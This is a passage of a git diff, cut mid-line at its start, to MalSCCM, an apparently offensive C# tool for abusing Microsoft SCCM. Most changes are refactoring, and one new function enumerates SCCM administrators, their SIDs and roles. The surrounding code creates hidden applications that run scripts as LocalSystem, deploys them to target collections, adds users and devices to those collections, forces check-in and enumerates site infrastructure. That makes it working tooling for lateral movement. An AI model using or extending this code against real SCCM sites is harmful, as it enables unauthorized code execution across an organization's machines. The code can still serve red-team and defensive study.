ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Application"); + var IDClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_Identification"); + var AppClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_Application"); object[] methodArgs = {null}; - object result = IDClass.InvokeMethod("GetSiteID", methodArgs); - string scopeid = (string)methodArgs[0]; + var result = IDClass.InvokeMethod("GetSiteID", methodArgs); + var scopeid = (string)methodArgs[0]; var trimscopeid = "ScopeId_" + scopeid.Trim(new char[] { '{', '}' }); Console.WriteLine("ScopeID: " + trimscopeid); @@ -27,7 +28,7 @@ public static bool FbCreateSCCMApplication() var NewFileID = "File_" + Guid.NewGuid(); Console.WriteLine("NewFileID: " + NewFileID); - StringBuilder xml = new StringBuilder(); + var xml = new StringBuilder(); xml.AppendLine(@"" + App.AppName + @"" + App.AppName + @"" + App.AppName + @"GLOBAL/ScriptDeploymentTechnologyScriptNativeSystemLocalSystem<?xml version=""1.0"" encoding=""utf-16""?>"); xml.AppendLine(@"<EnhancedDetectionMethod xmlns=""http://schemas.microsoft.com/SystemCenterConfigurationManager/2009/AppMgmtDigest"">"); @@ -58,7 +59,7 @@ public static bool FbCreateSCCMApplication() Console.WriteLine("Creating Instance"); - ManagementObject newInstance = AppClass.CreateInstance(); + var newInstance = AppClass.CreateInstance(); newInstance["SDMPackageXML"] = xml.ToString(); newInstance["IsHidden"] = true; @@ -82,10 +83,10 @@ public static bool FbRemoveSCCMApplication() try { var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); - ManagementObjectCollection objColl = mgmtSrchr.Get(); + var objColl = mgmtSrchr.Get(); foreach (ManagementObject obj in objColl) { @@ -111,15 +112,15 @@ public static bool FbDeploySCCMApplication() { try { - ManagementClass AppAssignementClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ApplicationAssignment"); + var AppAssignementClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_ApplicationAssignment"); var TargetCollectionID = Group.TargetCollectionID; var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); var CI_ID = ""; - int CI_IDint = 0; + var CI_IDint = 0; var CI_UniqueID = ""; foreach (var result in mgmtSrchr.Get()) @@ -131,7 +132,7 @@ public static bool FbDeploySCCMApplication() var Date = DateTime.Now.ToString("yyyyMMddHHmmss") + ".000000+***"; - ManagementObject newInstance = AppAssignementClass.CreateInstance(); + var newInstance = AppAssignementClass.CreateInstance(); newInstance["ApplicationName"] = App.AppName; newInstance["AssignmentName"] = App.AssignmentName; @@ -177,10 +178,10 @@ public static bool FbRemoveSCCMApplicationDeployment() try { var Query = new SelectQuery("Select * FROM SMS_ApplicationAssignment WHERE ApplicationName = '" + App.AppName + "'"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); - ManagementObjectCollection objColl = mgmtSrchr.Get(); + var objColl = mgmtSrchr.Get(); foreach (ManagementObject obj in objColl) { @@ -200,5 +201,4 @@ public static bool FbRemoveSCCMApplicationDeployment() return false; } } - } diff --git a/MalSCCM/lib/Check.cs b/MalSCCM/lib/Check.cs index a586681..bd173ca 100644 --- a/MalSCCM/lib/Check.cs +++ b/MalSCCM/lib/Check.cs @@ -1,20 +1,21 @@ using System; using System.Management; + using MalSCCM.Commands; -public class Check +public static class Check { public static bool FbSCCMDeviceCheckin() { try { - ManagementClass Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ClientOperation"); - ManagementBaseObject newInstance = Class.GetMethodParameters("InitiateClientOperation"); + var Class = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_ClientOperation"); + var newInstance = Class.GetMethodParameters("InitiateClientOperation"); newInstance["Type"] = 8; newInstance["TargetCollectionID"] = Group.TargetCollectionID; - ManagementBaseObject result = Class.InvokeMethod("InitiateClientOperation",newInstance,null); + var result = Class.InvokeMethod("InitiateClientOperation",newInstance,null); Console.WriteLine("ReturnValue: " + result.GetPropertyValue("ReturnValue")); Console.WriteLine("OperationID: " + result.GetPropertyValue("OperationID")); @@ -22,7 +23,6 @@ public static bool FbSCCMDeviceCheckin() Console.WriteLine("Checkin succeeded."); return true; - } catch (Exception e) { @@ -32,5 +32,4 @@ public static bool FbSCCMDeviceCheckin() return false; } } - } diff --git a/MalSCCM/lib/Enum.cs b/MalSCCM/lib/Enum.cs index 5f06653..e40c5b0 100644 --- a/MalSCCM/lib/Enum.cs +++ b/MalSCCM/lib/Enum.cs @@ -1,16 +1,19 @@ using System; +using System.Linq; using System.Management; +using System.Runtime.Remoting.Metadata.W3cXsd2001; using Microsoft.Win32; + using MalSCCM.Commands; -public class Enum +public static class Enum { public static bool FbGetSiteScope() { try { var osQuery = new SelectQuery("SMS_Authority"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\ccm"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\ccm"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, osQuery); @@ -18,7 +21,6 @@ public static bool FbGetSiteScope() { var siteCode = result.GetPropertyValue("Name").ToString(); var managementServer = result.GetPropertyValue("CurrentManagementPoint").ToString(); - if (!string.IsNullOrEmpty(siteCode)) { @@ -41,12 +43,13 @@ public static bool FbGetSiteScope() return false; } } + public static bool FbGetSiteScope2() { try { var osQuery = new SelectQuery("SMS_ProviderLocation"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, osQuery); @@ -74,12 +77,13 @@ public static bool FbGetSiteScope2() return false; } } + public static bool FbGetSiteScope3() { try { const string keyName = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\Mobile Client"; - string assignedsitecode = (string)Registry.GetValue(keyName, "AssignedSiteCode", "No assigned site found, is this machine managed by SCCM?"); + var assignedsitecode = (string)Registry.GetValue(keyName, "AssignedSiteCode", "No assigned site found, is this machine managed by SCCM?"); Console.WriteLine("SiteCode: " + assignedsitecode); Inspect.SiteCode = assignedsitecode; @@ -94,12 +98,13 @@ public static bool FbGetSiteScope3() return false; } } + public static bool FbGetSCCMComputer() { try { var Query = new SelectQuery("SMS_R_System"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -122,12 +127,13 @@ public static bool FbGetSCCMComputer() return false; } } + public static bool FbGetSCCMADForest() { try { var Query = new SelectQuery("SMS_ADForest"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -150,12 +156,13 @@ public static bool FbGetSCCMADForest() return false; } } + public static bool FbGetSCCMApplication() { try { var Query = new SelectQuery("SMS_Application"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -178,12 +185,13 @@ public static bool FbGetSCCMApplication() return false; } } + public static bool FbGetSCCMPackage() { try { var Query = new SelectQuery("SMS_Package"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -206,12 +214,13 @@ public static bool FbGetSCCMPackage() return false; } } + public static bool FbGetSCCMCollection() { try { var Query = new SelectQuery("SMS_Collection"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -245,7 +254,7 @@ public static bool FbGetSCCMPrimaryUser() try { var Query = new SelectQuery("SMS_UserMachineRelationship"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -273,12 +282,13 @@ public static bool FbGetSCCMPrimaryUser() return false; } } + public static bool FbGetSCCMDeployments() { try { var Query = new SelectQuery("SMS_ApplicationAssignment"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -306,16 +316,17 @@ public static bool FbGetSCCMDeployments() return false; } } + public static bool FbGetSCCMPrimaryServerRegKey() { try { const string keyName = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\DP"; - string mgmtServer = (string)Registry.GetValue(keyName, "ManagementPoints", "Management key not found, are you an SCCM client?"); - string siteServer = (string)Registry.GetValue(keyName, "SiteServer", "Key not found, are you on a management server?"); + var mgmtServer = (string)Registry.GetValue(keyName, "ManagementPoints", "Management key not found, are you an SCCM client?"); + var siteServer = (string)Registry.GetValue(keyName, "SiteServer", "Key not found, are you on a management server?"); const string keyNameID = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\Identification"; - string siteServerID = (string)Registry.GetValue(keyNameID, "Site Server", "Key not found, are you on a management server?"); + var siteServerID = (string)Registry.GetValue(keyNameID, "Site Server", "Key not found, are you on a management server?"); Console.WriteLine("Management Server: {0}", mgmtServer); Console.WriteLine("Primary Server: {0}", siteServer); @@ -331,6 +342,41 @@ public static bool FbGetSCCMPrimaryServerRegKey() return false; } } + + public static bool FbGetSCCMAdmins() + { + try + { + var query = new SelectQuery("SMS_Admin"); + var scope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); + scope.Connect(); + var searcher = new ManagementObjectSearcher(scope, query); + foreach (var result in searcher.Get()) + { + var logonName = result.GetPropertyValue("LogonName").ToString(); + var adminSid = result.GetPropertyValue("AdminSid").ToString(); + var roleNames = result.GetPropertyValue("RoleNames") as string[] ?? Array.Empty(); + var categoryNames = result.GetPropertyValue("CategoryNames") as string[] ?? Array.Empty(); + var collectionNames = result.GetPropertyValue("CollectionNames") as string[] ?? Array.Empty(); + + Console.WriteLine("UserName: {0}", logonName); + Console.WriteLine("SID: {0}", adminSid); + Console.WriteLine("Roles: {0}", string.Join(", ", roleNames)); + Console.WriteLine("Security Scopes: {0}", string.Join(", ", categoryNames)); + Console.WriteLine("Collections: {0}", string.Join(", ", collectionNames)); + Console.WriteLine(); + } + + return true; + } + catch (Exception e) + { + Console.WriteLine("\r\nFunction error - FbGetSCCMComputer."); + var stdErr = Console.Error; + stdErr.WriteLine($"Error Message: {e.Message}"); + return false; + } + } } diff --git a/MalSCCM/lib/Groups.cs b/MalSCCM/lib/Groups.cs index e5ca37c..baec6ec 100644 --- a/MalSCCM/lib/Groups.cs +++ b/MalSCCM/lib/Groups.cs @@ -1,15 +1,16 @@ using System; using System.Management; + using MalSCCM.Commands; -public class Groups +public static class Groups { public static bool FbGetSCCMCollectionID() { try { var Query = new SelectQuery("SMS_Collection"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -47,12 +48,13 @@ public static bool FbGetSCCMCollectionID() return false; } } + public static bool FbNewSCCMCollection() { try { - ManagementClass Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection"); - ManagementObject newInstance = Class.CreateInstance(); + var Class = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection"); + var newInstance = Class.CreateInstance(); newInstance["Name"] = Group.GroupName; newInstance["OwnedByThisSite"] = "True"; @@ -84,15 +86,16 @@ public static bool FbNewSCCMCollection() return false; } } + public static bool FbRemoveSCCMCollection() { try { - ManagementObject objHostSetting = new ManagementObject(); - objHostSetting.Scope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode); + var objHostSetting = new ManagementObject(); + objHostSetting.Scope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode); //define lookup query - string strQuery = @"SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"; + var strQuery = @"SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"; objHostSetting.Path = new ManagementPath(strQuery); //delete the Managementobject @@ -109,12 +112,13 @@ public static bool FbRemoveSCCMCollection() return false; } } + public static bool FbGetUserResourceID() { try { var Query = new SelectQuery("SMS_R_User"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -139,24 +143,25 @@ public static bool FbGetUserResourceID() return false; } } + public static bool FbAddUserToSCCMCollection() { try { - ManagementClass collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); - ManagementObject collQueryInstance = collQuery.CreateInstance(); + var collQuery = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); + var collQueryInstance = collQuery.CreateInstance(); collQueryInstance["QueryExpression"] = "Select * from SMS_R_User Where UniqueUserName='" + Group.UserName + "'"; collQueryInstance["RuleName"] = "Members of collection"; - ManagementObject collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); - ManagementBaseObject inParams = collInstance.GetMethodParameters("AddMembershipRule"); + var collInstance = new ManagementObject($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); + var inParams = collInstance.GetMethodParameters("AddMembershipRule"); Console.WriteLine("Commiting instance"); inParams.SetPropertyValue("collectionRule", collQueryInstance); - ManagementBaseObject outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); + var outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); return true; } @@ -168,6 +173,7 @@ public static bool FbAddUserToSCCMCollection() return false; } } + // To Do public static bool FbRemoveUserFromSCCMCollection() { @@ -184,24 +190,25 @@ public static bool FbRemoveUserFromSCCMCollection() return false; } } + public static bool FbAddDeviceToSCCMCollection() { try { - ManagementClass collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); - ManagementObject collQueryInstance = collQuery.CreateInstance(); + var collQuery = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); + var collQueryInstance = collQuery.CreateInstance(); collQueryInstance["QueryExpression"] = "Select * from SMS_R_System Where Name='" + Group.DeviceName + "'"; collQueryInstance["RuleName"] = "Members of collection"; - ManagementObject collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); - ManagementBaseObject inParams = collInstance.GetMethodParameters("AddMembershipRule"); + var collInstance = new ManagementObject($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); + var inParams = collInstance.GetMethodParameters("AddMembershipRule"); Console.WriteLine("Commiting instance"); inParams.SetPropertyValue("collectionRule", collQueryInstance); - ManagementBaseObject outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); + var outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); return true; } @@ -213,6 +220,7 @@ public static bool FbAddDeviceToSCCMCollection() return false; } } + // To Do public static bool FbRemoveDeviceFromSCCMCollection() { @@ -229,4 +237,4 @@ public static bool FbRemoveDeviceFromSCCMCollection() return false; } } -} +} \ No newline at end of file